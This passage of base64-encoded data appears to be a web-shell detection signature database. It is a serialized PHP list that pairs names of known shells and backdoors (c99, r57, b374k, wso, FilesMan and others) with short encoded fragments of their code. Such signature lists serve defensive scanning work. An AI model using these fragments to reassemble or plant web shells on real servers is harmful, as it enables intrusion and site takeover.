+alYyWVV4ck9FRmFaRVZhVjFwQkswdzFjSEpLUzNOM1pGUlVlUzgxZUZST2RqZ3llVmR0TUVvNGMz +Y3hSbmhOWm05SVdHOVhSREJ1UzBZPSI7czoxOToiZmlsZXNtYW5bNV1bMF1bcGhwXSI7czo2NDoi +bTkxY0R3dllqNGlPMzBOQ2lBZ0lDQWdJQ1J5YjNkYlhTQTlJQ0k4WWo1UVpYSnRjend2WWo0aU93 +MEtJQ0FnSSI7czoyMjoiRmFUYUxpc1RpQ3pbMl1bMF1bcGhwXSI7czo2NDoiMlBTUmZVa1ZSVlVW +VFZGc25jM1ZpYldsMGRpZGRPdzBLSkcxbGRHaHZaRDBrWDFKRlVWVkZVMVJiSjIxbGRHaCI7czoy +MToiY3liZXJzaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJ5Y3BMbTl1S0NkbWIyTjFjeWNzSUdaMWJt +TjBhVzl1S0dVcGV3b0pDV0Z5WjNNZ1BTQWtLQ2NqWlhaaGJFRnlaIjtzOjE3OiJiMzc0a1sxNV1b +MF1bcGhwXSI7czo2NDoiUjBkQk55OW9aR3A0WWxrd1pXaENXbmRGVEZsb09UWXdhVWxETlV0NFNG +aEVRWEJLVlVZdk1ITkRTRnA1Y1hKaSI7czoxNjoiYjM3NGtbMV1bMF1bcGhwXSI7czo2NDoiakVw +TGlJckpIWmlOR0U0T0RReE4xeHVJanNnZlNCOUlHWjFibU4wYVc5dUlHNWxOalkzWkdFM05pZ2tk +amsxTiI7czoyMDoicGhwc2hlbGxbMjldWzBdW3BocF0iO3M6NjQ6IlNraHJWMU5QTDFWTU5GQTJV +U3RyVjFaaU1EUkRNMFJOTDBoM2FucG1Na0pNVFV4eWJubzBaRWxXYzBscU1pY3MiO3M6MjA6InBo +cHNoZWxsWzEyXVswXVtwaHBdIjtzOjY0OiJnSUNjc0NpZHlkVjlpZFhSME15Y2dQVDRuSUNBZ0lD +QWdJQ2NzQ2lkeWRWOTBaWGgwTVRJblBUNG5ZbUZqYXkxIjtzOjE1OiJyNTdbMTVdWzBdW3BocF0i +O3M6NjQ6InVSRlZRUTJWUVNIQndjazV5YTJnM056Uk1SRko0UlhaTVltaE5WRVk1V0VwVmRWQkdh +M3BhU2xoWmVWWkNhVmgiO3M6MTU6ImNib3RbMF1bMF1bcGhwXSI7czo2NDoiSlRFVlRXeWRwYldG +blpTZGRXeWR1WVcxbEoxMDdJQ1IxYzJWeVptbHNaVjkwYlhBZ1BTQWtYMFpKVEVWVFd5ZCI7czoy +Njoic2hlbGxfdXBsb2FkZXJbMTldWzBdW3BocF0iO3M6NjQ6IkNBZ0lDQWdJQ0FnSUNBZ0lDQWdJ +Q0FnWld4elpRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSHNLSUNBZ0kiO3M6MTY6ImRldmls +WzBdWzBdW3BocF0iO3M6NjQ6IldGck93b0tJQ0FnSUdOaGMyVWdJbWQ2WkdWamIyUmxJam9LSUNB +Z0lDQWdhV1lnS0dselgyWnBiR1VvSkZCaGQiO3M6MTk6InNyb3NoZWxsWzBdWzBdW3BocF0iO3M6 +NjQ6Im1RMjl5TUhGeFNFUmlkRFppTUZWdFJWbDRUa1ZpWkVNclFuTXhPSFJtZUV4a1UxQjRSVTFT +Y1dKa1FtOXJUR1kiO3M6MjY6InNoZWxsX2NvbW1hbmRlclswXVswXVtwaHBdIjtzOjY0OiJwcU9F +MUZZVTlaVFU4NFRVSlhPVVF3VERSYWRrbzVNMjFaWVhOaldWaFFibFZJWW1KV00xaE1SMEl2ZUhK +aWVrIjtzOjE3OiJiMzc0a1sxNl1bMF1bcGhwXSI7czo2NDoicGJtZGthVzVuY3lBeklpQnphWHBs +UFNJMUlqNDhMMlp2Ym5RK1BHSStRbmx3WVhOeklGTm9aV3hzSUV0MWJHeCI7czoxOToic2FmZW1v +ZGVbNl1bMF1bcGhwXSI7czo2NDoibGFXWW9jM1J5ZEc5c2IzZGxjaWdrWTIxa0tTQTlQU0FpWVdK +dmRYUWlLUW9KQ1hzS0NRa0pjSEpwYm5RZ0lrRiI7czoyOToiYWpheF9jb21tYW5kX3NoZWxsWzBd +WzBdW3BocF0iO3M6MTM5OiJiYjpYSGd5TUZ3MU1seDRNbVpjTkRCY2VEWTFYREUyTmx4NE5qRmNN +VFUwWEhneU9Gd3hOak5jZURjMFhERTJNbHg0TldaY01UWXlYSGcyTlZ3eE5qQmNlRFpqWERFME1W +eDROak5jTVRRMVhIZ3lPRnd4TkROY2VEWTRYREUyTWx4NE1qaGNOVEE9IjtzOjIwOiJwaHBzaGVs +bFsyN11bMF1bcGhwXSI7czo2NDoiV2JXUnNVakExUTJOcmN6SmtWVTQxVTIwd2Qxb3ljRlpYYXpG +eldrVjRURTlHUmtKVE0wMHlXbXR3V0dGSFVuUiI7czoyNjoic2hlbGxfdXBsb2FkZXJbMThdWzBd +W3BocF0iO3M6NjQ6ImlidDlOTlFxeHdRQURzQVBEOXdhSEFnWlhaaGJDaGlZWE5sTmpSZlpHVmpi +MlJsS0NkSlIxWnFZVWM0WjBsdWQiO3M6MTU6ImNtZFsxMl1bMF1bcGhwXSI7czo2NDoibU50VW5k +amJWWjZZM2sxTUdWSVVXNUxWSE5PUTJsQlowbERRbnBsVnpGellWYzFja3REWTNaaFJ6bDBXbE00 +YiI7czoyMToiYnVja2V0aGVhZFswXVswXVtwaHBdIjtzOjY0OiI3SUFvZ0lDQWdJQ0FnSUdadmJu +UXRabUZ0YVd4NU9pQlVaWEp0YVc1MWN5d2dSbWw0WldSemVYTXNJRVpwZUdWIjtzOjIzOiJmdWNr +cGhwc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoiWTJaellYWmxZMjl1ZEdWdWRENE5Danh3Y21VK0RR +b2piWGxXWVhJakRRbzhMM0J5WlQ0TkNqd3ZZMlpwWmo0TiI7czoxNzoiY2ZleGVjWzBdWzBdW2Nm +bV0iO3M6NjQ6IjFWclIwMUNlbU5hVDJJdmJEWkVNVWtuTENkd1UxZ3lNVTgyTDNjM2FqaGxWekJJ +VW1kSmRHZEZNME5JWWtWTlkiO3M6MTk6InBocHNoZWxsWzldWzBdW3BocF0iO3M6NjQ6Im5aa1Z6 +VXdTME5TYTJKRGEzVktlVUo2WkZkT2FscFlUbnBKUTJOMVNraE9NVmt5VFhWS2VVSnRXVmRzYzBs +RFkiO3M6MTc6InBocHNweVswXVswXVtwaHBdIjtzOjY0OiJBbUppQW9RR2x6WDNKbFlXUmhZbXhs +S0NJa1pHbHlMeVJtYVd4bElpa3BJQ2tLSUFrSkNRbGxZMmh2SUdKMWFXIjtzOjE5OiJwaHBzaGVs +bFswXVswXVtwaHBdIjtzOjY0OiJDbWxtSUNnaFpXMXdkSGtvSkhkdmNtdGZaR2x5S1NrZ2V3b2dJ +QzhxSUVFZ2QyOXlhMlJwY2lCb1lYTWdZbVZsIjtzOjIzOiJheXlpbGRpel90aW1bMF1bMF1bcGhw +XSI7czo2NDoia2MxYUdSSVNuQmxRMEU1U1VOUmVFOTVRVTVEYVVGblNVTkJaMGxEUVdkSlEwRm5T +VWN4TlVsR2QydFpXRXB1UyI7czoxNToiYzEwMFsyXVswXVtwaHBdIjtzOjY0OiJTZ2tYME5QVDB0 +SlJWc25kaWRkS1NCaGJtUWdKRjlEVDA5TFNVVmJKM1luWFQwOUoyUW5LWHNLSUNBS0lDQnBaIjtz +OjIzOiJzaW1wbGVfc2hlbGxbMV1bMF1bcGhwXSI7czo2NDoiNU1XVzFXVTJNeWJHOWtSVVY1V214 +b00xRlZXVEZPYXpWSlpXMUtlazlYVmxaTmJFNUhUbWwwVGljdUNpZGlWWCI7czoxNDoiZngwWzJd +WzBdW3BocF0iO3M6NjQ6Ik1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlN +akl5TWpJeU1OQ2lNZ1pIVnRjQ0IyWVgiO3M6MjM6ImluY2x1ZGVzaGVsbFswXVswXVtwaHBdIjtz +OjY0OiJkQmFsQjVWbHAyVmtOQ1FtdFpTakl2TjBGNVEzWmlZMkUwU0U0M1NEbEpSM0ZyWTBKYVRH +UXhhME5DUjBkRGIxIjtzOjI1OiJjb2NhY29sYV9zaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJCT1Ey +MXNiVXRIYkhwak1sWXdTME5TWmxJd1ZsVlhlV1F3WWxoQmJsaFRhM0JFVVc5blpYY3dTMGxEUVdk +UlNGIjtzOjE1OiJyNTdbMTNdWzBdW3BocF0iO3M6NjQ6IkM5RVNWWStQQzlVUkQ0OEwxUlNQZ284 +UHlCcFppZ2tZMmhrYVhJaFBXZGxkR04zWkNncEtYcy9QZ284VkZJK1AiO3M6MTY6ImR0b29sWzBd +WzBdW3BocF0iO3M6NjQ6IlIwbEdPRGxoTVFvOFAzQm9jQ0FLWlhaaGJDaGlZWE5sTmpSZlpHVmpi +MlJsS0NkaFYxbG5TMGRzZW1NeVZqQkwiO3M6MTU6ImNtZFsyNl1bMF1bcGhwXSI7czo2NDoiSXVK +R2R5YjNWd1gzZHlhWFJsTGlJK1BDOW1iMjUwUGp3dmRHUStQSFJrSUdKblkyOXNiM0k5WENJalEw +TkRRMCI7czoxNzoiYW5kcjNhWzBdWzBdW3BocF0iO3M6NjQ6IkJvY0UxNVFXUnRhVzR2SUZ4eVhH +NGlPd29rWkdGMFlTQXVQU0lqSUdoMGRIQTZMeTkzZDNjdWNHaHdiWGxoWkciO3M6MTc6ImJhY2t1 +cFswXVsyXVtwaHBdIjtzOjY0OiJrWlNna1ptbHNaU2s3Q2lBZ0lDQWdhV1lnS0daMWJtTjBhVzl1 +WDJWNGFYTjBjeWdpWW1GelpXNWhiV1VpS1NrIjtzOjE5OiJzYWZlbW9kZVsyXVswXVtwaHBdIjtz +OjY0OiI0bktUc0tDZ29nSUdWeWNtOXlYM0psY0c5eWRHbHVaeWhGWDFkQlVrNUpUa2NwT3dvZ0lH +bHVhVjl6WlhRb0ltIjtzOjE1OiJlcm5lWzFdWzBdW3BocF0iO3M6NjQ6ImRqZHlVVzlzVG5ZMk5t +NWlVRVU1VUhwdE1EZHVka1F4U1dJME1XaHpWVEZXU2pkVE1FVlJiazl5WkhaWGVpOWkiO3M6MjA6 +InBocHNoZWxsWzIyXVswXVtwaHBdIjtzOjY0OiJZMjFrV3pCZEtUc0tJQ0FnSUNBZ0lDQWdJQ1Iy +YUc5emRDQTlJR1Y0Y0d4dlpHVW9Ja0FpTENSdWFXTnJXekZkIjtzOjIxOiJub2dyb2RwQm90WzBd +WzFdW3BocF0iO3M6NjQ6InlkamIzQjVYMko1Y0dGemN5ZGRLU2tLSUNBZ0lDQWdJSHNLSUNBZ0lD +QWdJQ0FnQ2lBZ0lDQWdJQ0FnSUNCcFoiO3M6MjE6Im11bGNpc2hlbGxbMF1bMF1bcGhwXSI7czo2 +NDoiOUN3MFlEUXNOQzgwTFhSZ3RHQU1pY3NDaWR5ZFY5MFpYaDBOekVuUFQ0aTBKTFJndEMrMFlE +UXZ0QzVJTkMvMCI7czoxOToic3B5c2hlbGxbMF1bMF1bcGhwXSI7czo2NDoiM1JwYjI0Z2JHbHpk +R2x1WnlBb0pHeHBjM1FwSUhzS0NXZHNiMkpoYkNBa1pHbHlaV04wYjNKNUxDQWthRzl0WiI7czox +OToid2ViYWRtaW5bM11bMl1bcGhwXSI7czo2NDoibWtuTENkblR6bFRNSFZpU25sRldtVklTVzVZ +V1VaTGRFRW5MQ2RoV21WalkyMVRVSGRyVVdGb2RrTXliazlrZCI7czoxOToicGhwc2hlbGxbN11b +MF1bcGhwXSI7czo2NDoibU5DTWpZMmFsRmFOR1o1Y0hoTWJYVkdUMmhaYlZOdlZ6RlRUWFozZG5C +MWR6bDBNbmxhZDFaWGVrMUxURXRLZSI7czoxOToib3Jic2hlbGxbMF1bMF1bcGhwXSI7czo2NDoi +WFUyZ3dVVkZFZERnNVprcGpkamhETnpRclJEWm9URFJTWW5kT2RrNVpOMU0xUjB4c1QwcGhkR0Y1 +UXpKemFqbCI7czoyMDoicGhwc2hlbGxbMThdWzBdW3BocF0iO3M6NjQ6IklpQjJZV3gxWlQxY0lp +SXVKSE54YkhCaGMzTXVJbHdpSUM4K0RRb0pDUWtKQ1R4cGJuQjFkQ0IwZVhCbFBWd2kiO3M6MTY6 +ImIzNzRrWzldWzBdW3BocF0iO3M6NjQ6IjBSUmIyZEtSMngxWVdsQk9VbERVbVpWTUZaVFZtdFdV +MWQ1U2xOU1ZrWldVbFpPVlZneFZsTlRVMHBrVDNjd1MiO3M6MjA6ImZpbGVzbWFuWzE3XVswXVtw +aHBdIjtzOjY0OiIwWnpTVVF3WjBvd2JFOEtWVEJXVTFaRFFrcFViRkpRU1VOamRVcElVbWhaYlho +c1RHbGpaMHREWTNWaFZ6RjNZIjtzOjE1OiJ3c29bMTZdWzBdW3BocF0iO3M6NjQ6ImJDQTlJQ1Jm +UmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZE93b2dJQ0FrWkdWNklEMGdKSEIzWkdScGNpNGki +O3M6MTQ6ImNtZFsxXVswXVtwaHBdIjtzOjY0OiJnSUNCbFkyaHZJQ0k4ZEdGaWJHVWdZbTl5WkdW +eVBTY3hKeUIzYVdSMGFEMG5OakFsSno0OGRISStQSFJrUGlSIjtzOjIyOiJvbmJvb21zaGVsbFsw +XVswXVtwaHBdIjtzOjY0OiJuUlZnNVQwSnVWamhZVGpkMlVVWmhLM1p4Yldob1FVeFNhamR5UVZR +MVpFZ3JkbmRMYkhSQ2NYZFlMek5QZUZaIjtzOjE0OiJmeDBbMF1bMF1bcGhwXSI7czo2NDoiemFD +Z2tjR0YwYUNrN0RRb0pmUTBLRFFvSmQyaHBiR1VnS0hOMGNuQnZjeWdrY0dGMGFDd2dKSEJoZEhS +bGNtNCI7czoxOToid2ViYWRtaW5bNF1bMl1bcGhwXSI7czo2NDoiUW8vUGcwS1BFWlBVazBnYldW +MGFHOWtQVkJQVTFRZ1JVNURWRmxRUlQwaWJYVnNkR2x3WVhKMEwyWnZjbTB0WiI7czoyNjoic2hl +bGxfdXBsb2FkZXJbMTJdWzBdW3BocF0iO3M6NjQ6IlVGQlFVRlJRVUpCUVdkM1FVRkJVQzh2THk4 +dlRXMWplazF0Wmk5TmVrcHRXbHB6ZWsxNlVDOHZla0ZCUVNJdUMiO3M6MjA6ImN0dF9zaGVsbFsw +XVswXVtwaHBdIjtzOjY0OiI5eVpXRmphQ2drY21WMElHRnpJQ1J6YVhSbEtTQmxZMmh2S0NJOGJH +aytKSE5wZEdWY2JpSXBPdzBLSUNBZ0lHIjtzOjE5OiJoYWNrZXJwc1sxXVswXVtwaHBdIjtzOjY0 +OiJtUnZWM0EyV0RoaVZqbDZhMHQzZW5OcVVuWjFSRmxYY0RZeU1tWndPRVJ6VnpReWNuUnNXVVZq +WkdnelVuSlViIjtzOjIwOiJzdHVuc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoid29KQ1hOMWNHVnlL +RzVsZHlCQ2IzSmtaWEpNWVhsdmRYUW9LU2s3Q2drSkNna0pkR1Y0ZENBOUlHNWxkeUJLWSI7czox +OToiamF2YXNoZWxsWzBdWzBdW3B5XSI7czo2NDoiWW5WMGRHOXVJRzl1WTJ4cFkyczlYQ0owWlhO +MFgzQnliMjF3ZENneUtWd2lJSFpoYkhWbFBWd2lJaTVsZENnbiI7czoyNToicGhwZmlsZW1hbmFn +ZXJbM11bMl1bcGhwXSI7czo2NDoiWjNkWmMzWkdReXRsZG14alMwTmpWSGhuT0RGemR6aDBXRVJq +UkROYU9GRm9NRVJhZGxrcmIybDJabGNyYmxCdyI7czoxNjoiYjM3NGtbM11bMF1bcGhwXSI7czo2 +NDoid2lZMjh1YVdRaUxDSnBaU0lzSW1OdkxtbHNJaXdpWTI4dWFXMGlMQ0pqYnk1cGJpSXNJbWx6 +SWl3aWFYUWlMQyI7czoyNzoic2Nhbm5lcl9qYXRpbWNyZXdbMF1bMF1bcGxdIjtzOjY0OiJNME5U +WTNPRGt3S1M0aUt6QWlLVHNnZlNCbGJITmxJSHNnYVdZZ0tFQnRZV2xzS0NSMk1ERmlObVV5TURN +c0lDIjtzOjIwOiJwaHBzaGVsbFszMF1bMF1bcGhwXSI7czo2NDoiOXliUzV6ZFdKdGFYUW9LU0kr +Q2p3L2NHaHdDaThxSUU1dmR5QjNaU0J0WVd0bElHRWdiR2x6ZENCdlppQjBhRyI7czoxOToicGhw +c2hlbGxbNF1bMF1bcGhwXSI7czo2NDoiMVF6WkhWYVdFbDJVak5LZG1SWVFUaE1Na2tyVUVNNU1G +cEVORGhrUjFFclNVTkpOMGxEUVdkSlEwRm5SRkZ2WiI7czoxNToicjU3WzExXVswXVtwaHBdIjtz +OjY0OiIxeDRNREJjZURBd1hIZ3dNRng0WlRsY2VHSXdYSGhtWlZ4NFptWmNlR1ptWEhobVpseDRN +alZjZUdOaFhIZzFNIjtzOjI2OiJzaGVsbF91cGxvYWRlclsxN11bMF1bcGhwXSI7czo2NDoiRkkz +U1V4aE4zbzRlRkZTZVZOVVdEbFRja05wZUZGU2VWTlVXRGxTTVc4eVJGRkZTRzV5UmpKRlFqVXlS +RkZ1YSI7czoyNzoiYnJ1dGVfZm9yY2VfdG9vbFsyXVswXVtwaHBdIjtzOjY0OiJGdVlTd2dTR1Zz +ZG1WMGFXTmhPeUJVUlZoVUxVUkZRMDlTUVZSSlQwNDZJRzV2Ym1VS2ZRb3VZMjl1ZEdWdWRDIjtz +OjE2OiJyYWRlclswXVswXVthc3BdIjtzOjY0OiJrSkpVVXBVVlZNMFIxZE5RamhWUkZWMFVUVkRj +MVZ4ZGtkdWR6ZDRTMGRxUlVOcVIwSkRNa2w1UTFNNWRqRlRSIjtzOjI1OiJzaGVsbF91cGxvYWRl +cls4XVswXVtwaHBdIjtzOjY0OiIwK0pHTjVZbVZ5TVRjelgyUmxZMjlrWlNncE93MEtMeW9nZEdG +dWEzTWdabTl5T2lCTmNsOUhZVzVFY25WdVdDIjtzOjIxOiJjeWJlcnNoZWxsWzJdWzBdW3BocF0i +O3M6NjQ6IlRvOGFXNXdkWFFnZEhsd1pUMGlkR1Y0ZENJZ2JtRnRaVDBpYjJ4a2JtRnRaU0lnZG1G +c2RXVTlJakJzWkNCdVkiO3M6MjA6Im5leHBsMHJlclswXVswXVtwaHBdIjtzOjY0OiJ5Y3NKMkp6 +YUdWc2JDYzlQaWRDYVc1a2MyaGxiR3duTENkcmFXeHNKejArSjB0cGJHd2dVMmhsYkd3bktUc05D +IjtzOjE1OiJnb29uWzBdWzBdW3BocF0iO3M6NjQ6IkFnSUNBOFptOXVkQ0J6YVhwbFBTSXlJaUJt +WVdObFBTSlVZV2h2YldFaVBrWjBjQ0E4TDJadmJuUStEUW9nSUMiO3M6MTc6ImNwYW5lbFsyXVsw +XVtwaHBdIjtzOjY0OiJiaUFpTGlKUVF6a3dJRm9nSWk0aVdDQWlMaUpvTUNCWklDSXVJbGhLYkZs +VU5HNVBNekFnVGlCRElpNGliVlpxIjtzOjIzOiJzaW1wbGVfc2hlbGxbMl1bMF1bcGhwXSI7czo2 +NDoiWVdSNk1uSjROSFZsTmpNeU4zRXhXZzBLVUV3elNVNTJkbHA0TDNCRUwzcGFaa3RFTjJST1My +WTFNREJKY0dzeiI7czoxNjoiZmVuaXhbMF1bMF1bcGhwXSI7czo2NDoiaGpiMlJsWkNCaWVTQmth +VzVuWjI4cExTMCtQQzltYjI1MFBqd3ZZMlZ1ZEdWeVBnb2lPd29LQ21sbUlDZ2hhWCI7czoxNjoi +bXlzcWxbMl1bMF1bcGhwXSI7czo2NDoiaVBnMEtQSFJsZUhSaGNtVmhJSEp2ZDNNOUlqRTVJaUJ1 +WVcxbFBTSlRNU0lnWTI5c2N6MGlPRGNpUGljN0RRcCI7czoyNjoiaXRzZWN0ZWFtX3NoZWxsWzBd +WzBdW3BocF0iO3M6NjQ6ImJHUmxjaXhVVWxWRkRRcHlaWE53YjI1elpTNTNjbWwwWlNnaVJtOXNa +R1Z5T2lBaUlDWWdjMlZzUm05c1pHVnkiO3M6MTg6Im50ZGFkZHlbMV1bMF1bYXNwXSI7czo2NDoi +dldGTUtVVkpUUWtZNGREWllWRTR5V1VoaVVXeDZWVmxyTm5GcGRVbHNiRk56ZFhweGEyOUhWMDVp +V21oMWQyWSI7czoxNjoiYjM3NGtbMF1bMF1bcGhwXSI7czo2NDoiVTBWTVJpZGRMaUkvWVdOMFBX +MWhibUZuWlhJbVpHVnNQU0l1SkdSakxpSStSR1ZzUEM5MFpENGlPd29rWkdseSI7czoxNzoibnNo +ZWxsWzFdWzBdW3BocF0iO3M6NjQ6IkFpZEdsdFpXOTFkQ0lLQ1dWc2MyVTZDUW9KQ1dsbUlIQjNY +Mmx1SUQwOUlGQlhPZ2tLQ1FrSlkyOXViaTV6WlciO3M6MjE6InBoeXRvbnNoZWxsWzBdWzBdW3B5 +XSI7czo2NDoibkJ2Y0dWdUlpa3BldzBLWm5WdVkzUnBiMjRnYlhsemFHVnNiR1Y0WldNb0pHTnZi +VzFoYm1RcElIc05DbWxtSSI7czoyMToibG9jdXNzaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJqYkhW +a1pTZ2lMMlYwWXk5d1lYTnpkMlFpS1RzTkNtbHVhVjl5WlhOMGIzSmxLQ0p6WVdabFgyMXZaR1Vp +S1RzIjtzOjIwOiJyb290c2hlbGxbMl1bMF1bcGhwXSI7czo2NDoiRzF3VjBGUFFWZFlVVEJ1TlVK +UlBUMG5LU2twT3lCOURRcGxiSE5sSUhzZ1pYWmhiQ2huZW1sdVpteGhkR1VvWSI7czoyNToic2hl +bGxfdXBsb2FkZXJbNV1bMF1bcGhwXSI7czo2NDoiK1BHSnlQaWM3RFFwbFkyaHZJQ2RUWlhKMlpY +SWdhVzVtYjNKdFlYUnBiMjV6UEdKeVBqeGljajRuT3cwS1pXTiI7czoxOToiYmFja2Rvb3JbMF1b +MF1bcGhwXSI7czo2NDoiUXpRNFZrNWxla2hQZEc4M2JVVnpOSFo2VjBoRWNIRkhkR3hoTjBnM2My +UTVVQ3MzUWpaSVNqQldjWGc0ZFRkNSI7czoyOToiZ29oYWNrX3Bvd2Vyc2VydmVyWzBdWzBdW3Bo +cF0iO3M6NjQ6IkFnSUNBZ0lDQWdJQ0FnYlhrZ0pHNWhkSEpwZUNBOUlDUXhPdzBLSUNBZ0lDQWdJ +Q0FnSUNBZ2JYa2dKR0Z5WnkiO3M6MTg6InNoZWxsYm90WzJdWzBdW3BsXSI7czo2NDoiWW9JQ1Jm +VUU5VFZGc25YMlZrYVhRblhTQXBJSHNLQ1dWamFHOGdKenhpY2o0OFptOXliU0J1WVcxbFBTSjBa +WCI7czoxNToiY21kWzMyXVswXVtwaHBdIjtzOjY0OiJHVXdYSGcyTmx4NE9EbGNlRFExWEhoalpW +eDRaVGhjZUdGaFhIaG1NbHg0Wm1aY2VHWm1YSGc0TTF4NFl6UmNlIjtzOjI0OiJzaGVsbF9leHBs +b2l0WzBdWzBdW3BocF0iO3M6NjQ6IkZyT3dvSkNXTmhjMlVnTlRvS0NRa0pabTl5S0Rza1gxQlBV +MVJiSjNBeUoxMGdQRDBnSkY5UVQxTlVXeWR3TXkiO3M6MTk6Im9yYnNoZWxsWzFdWzBdW3BocF0i +O3M6NjQ6IlJmVUU5VFZGc2laaUpkSUQ4K0RRbzhQeUI5SUQ4K0RRbzhQeUFrZEdWemRGOW1kVzVq +SUQwZ1kzSmxZWFJsWDIiO3M6MTQ6ImNtZFs5XVswXVtwaHBdIjtzOjY0OiJSUVdabmEzSk5NbmRE +Y0RWbFYwUk5OSEozZVVNdlYwUndVek4wUTNSMFJWRTJXVEpyWTFwR1RtOXdSRzlwU2pSIjtzOjE5 +OiJha2F0c3VraVswXVswXVtwaHBdIjtzOjY0OiJUUlZKV1JWSmZWa0ZTVTFzblNGUlVVRjlZWDBa +UFVsZEJVa1JGUkY5R1QxSW5YU2twZXdvZ0lHVmphRzhnSWp4IjtzOjE0OiJnZnNbMV1bMF1bcGhw +XSI7czo2NDoiWFRYaG1SRU4zVTB4SFRYVndTVVY0UzBWdVZYQXZkMnhrY1dSWWRsSmlkVkJvY0do +Wk1YRTJjbUk0Vm1aS1owWiI7czoxNzoiYjM3NGtbMTBdWzBdW3BocF0iO3M6NjQ6ImpBM1EybFNj +RmxYVW10amFqRndZbTFXTUZneVJqQmlNalJ2U2toU2FHTnRaR3hrUTJ0blpraDNaMXBIYkd4TFEi +O3M6MTc6ImNvZGVyelswXVswXVtwaHBdIjtzOjY0OiJrTnZiblJsYm5RdGRIbHdaVG9nZEdWNGRD +OW9kRzFzWEc1Y2JpSTdEUXB3Y21sdWRDYzhJVVJQUTFSWlVFVWdhIjtzOjE5OiJwcml2OF9zY3Jb +MV1bMF1bcGxdIjtzOjY0OiJjeEp6c0tDbWxtS0NSZlUwVlRVMGxQVGxzbllXNG5YVDA5TUNsN0Nt +VmphRzhnSkdobFlXUmxjanNLWldOb2J5IjtzOjI1OiJhbnRpY2hhdF9zaGVsbFswXVswXVtwaHBd +IjtzOjY0OiJ3K0NqeG9aV0ZrUGdvOGRHbDBiR1UrVW5VeU5GQnZjM1JYWldKVGFHVnNiQ0F0SUNJ +dUpGOVFUMU5VV3lkamJXIjtzOjE0OiJjbWRbMl1bMF1bcGhwXSI7czo2NDoiUEw4SUNBZ0lDQWdJ +Q0FnSUNBZ1hDSWdQaUk3Q21WamFHOGdJZ284YUhJZ2QybGtkR2c5WENJeE1EQWxYQ0lnYyI7czoy +MToiY3liZXJzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJFMVVpdFFSa0pSTTBWdmJXZFNOSFJpYkhw +WlpVRldialF2VTNjMU5teHFXa053UWpWdFdIQnhibU01UmtaQk1XIjtzOjIwOiJob3N0ZGV2aWxb +MV1bMF1bcGhwXSI7czo2NDoiVjlsYm1ReExpUm1aVHNLZlFwcFppZ2tiWGx6Y1d4ZmIyNThmQ1J0 +YzNOeGJGOXZibng4SkhCblgyOXVmSHdrYiI7czoxNToicjU3WzE2XVswXVtwaHBdIjtzOjY0OiJn +a2Jpd2tkSGgwUFNjbktRcDdDbVZqYUc4Z0p6eDBZV0pzWlNCM2FXUjBhRDB4TURBbElHTmxiR3h3 +WVdSa2FXIjtzOjE0OiJyNTdbOF1bMF1bcGhwXSI7czo2NDoia2NtVnpPdzBLQ1FrSmZRMEtDUWw5 +RFFvSkNTUnpkV05qWlhOeklEMGdNRHNOQ2drSkpHRjBkR1Z0Y0hSeklEMCI7czoxNDoid3NvWzFd +WzBdW3BocF0iO3M6NjQ6IldGdVpDZGRLU2tOQ2cwS0NRa0pDUWw3RFFvTkNna0pDUWtKQ1hCeWFX +NTBJQ0k4Y0hKbFBpSTdEUW9OQ2drSkMiO3M6MjA6Imlyb25zaGVsbFswXVswXVtwaHBdIjtzOjY0 +OiJDQWdJQ0FpTWpFNFhDNHhPRnd1TVRjMFhDNHlOeUlzRFFvZ0lDQWdJQ0FnSUNJMk5Wd3VNek5j +TGpnM1hDNDVOIjtzOjI0OiJzcGFtX3RydXN0YXBwWzFdWzFdW3BocF0iO3M6NjQ6Im1NakJtT0Rn +elpTSTdDaVJqYjJ4dmNpQTlJQ0lqWkdZMUlqc0tKR1JsWm1GMWJIUmZZV04wYVc5dUlEMGdKMFoi +O3M6MjA6ImZpbGVzbWFuWzE1XVswXVtwaHBdIjtzOjY0OiJTZ2tYMU5GVWxaRlVsc25TRlJVVUY5 +SVQxTlVKMTB1SjE5TmVWTlJUQzV6Y1d3bktUc0tDZ29LQ1dobFlXUmxjIjtzOjE3OiJwaHBzcHlb +MV1bMF1bcGhwXSI7czo2NDoiUEQ5d2FIQWdjR0Z6YzNSb2NuVW9aMlYwWlc1MktDSklWRlJRWDBG +RFEwVlFWRjlNUVU1SFZVRkhSU0lwS1RzZyI7czoyNjoiYWNjZXB0X2xhbmd1YWdlWzBdWzBdW3Bo +cF0iO3M6NjQ6ImtYMUJQVTFSYkozQXhKMTBnUFQwZ0ozbGxjeWNwQ2drSmFXWW9RSFZ1YkdsdWF5 +aHdjbVZuWDNKbGNHeGhZMlUiO3M6MjA6ImZpbGVzbWFuWzIxXVswXVtwaHBdIjtzOjY0OiIwaWMy +TmhiblI1Y0dVaVBnMEtJQ0FnSUNBZ0lDQWdQRzl3ZEdsdmJpQjJZV3gxWlQwaU1TSStEUW9nSUNB +Z0lDIjtzOjIwOiJmaWxlc21hblsyNV1bMF1bcGhwXSI7czo2NDoid1pTSXNJQ0ozSWlrc0lDQXZM +eUJ6ZEdSdmRYUWdhWE1nWVNCd2FYQmxJSFJvWVhRZ2RHaGxJR05vYVd4a0lIZCI7czoyMjoic2hl +bGxhdGlsZGlbMV1bMF1bcGhwXSI7czo2NDoiM0p6Snl3Z01DazdEUXBBYzJWMFgzUnBiV1ZmYkds +dGFYUW9NQ2s3RFFwQWMyVjBYMjFoWjJsalgzRjFiM1JsYyI7czoyMDoiMW43M2N0aW9uWzBdWzBd +W3BocF0iO3M6NjQ6ImtZWFJoSjMwdURRb2pJRTkwYUdWeUlIWmhjbWxoWW14bGN5QmpZVzRnWW1V +Z1lXTmpaWE56WldRZ2RYTnBibWMiO3M6MTk6ImNnaS1zaGVsbFswXVswXVtwbF0iO3M6NjQ6Inlh +VzVuSUdSemRGQmhkR2dwSUhzS0NXSnZiMnhsWVc0Z1lsSmxkQ0E5SUhSeWRXVTdDZ2tLQ1hSeWVT +QjdDZ2siO3M6MjM6ImpzcHdlYnNoZWxsWzBdWzBdW2phdmFdIjtzOjY0OiJCcFlqTldNR05JVmpC 